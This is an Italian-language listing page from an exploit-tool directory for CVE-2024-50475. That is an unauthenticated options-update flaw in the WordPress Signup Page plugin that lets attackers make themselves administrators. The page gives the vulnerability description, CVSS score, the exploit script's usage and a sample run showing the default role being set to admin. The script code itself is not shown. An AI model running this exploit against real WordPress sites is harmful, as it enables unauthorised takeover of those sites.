Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-50475 — Pagina di registrazione <= 1.0 - Aggiornamento arbitrario delle opzioni non autenticato | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/cve-2024-50475
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingConfigurazione Errata
GitHubrandomrobbiebf/cve-2024-50475

CVE-2024-50475

Pagina di registrazione <= 1.0 - Aggiornamento arbitrario delle opzioni non autenticato

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-50475

Signup Page <= 1.0 - Aggiornamento non autenticato di opzioni arbitrarie

Descrizione:

Il plugin Signup Page per WordPress è vulnerabile a modifiche non autorizzate dei dati che possono portare a escalation dei privilegi a causa di un controllo delle capacità mancante in tutte le versioni fino alla 1.0 inclusa. Ciò consente ad attaccanti non autenticati di aggiornare opzioni arbitrarie sul sito WordPress. Questo può essere sfruttato per impostare il ruolo predefinito per la registrazione come amministratore e abilitare la registrazione degli utenti, permettendo agli attaccanti di ottenere accesso amministrativo al sito vulnerabile.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50475
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: signup-page

Come usare

root@kitploit:~
$ python3 CVE-2024-50475.py -h
usage: CVE-2024-50475.py [-h] -u URL [-f FIX]

CVE-2024-50475 | Signup Page <= 1.0 - Unauthenticated Arbitrary Options Update The Signup Page plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check in
all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user
registration for attackers to gain administrative user access to a vulnerable site.

options:
  -h, --help         show this help message and exit
  -u URL, --url URL  Website URL
  -f FIX, --fix FIX  Reset after Exploit

POC

root@kitploit:~
$ python3 CVE-2024-50475.py -u http://kubernetes.docker.internal
Vulnerability check: http://kubernetes.docker.internal
Option set successfully: http://kubernetes.docker.internal/wp-admin/admin-ajax.php
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.

Scarica lo strumento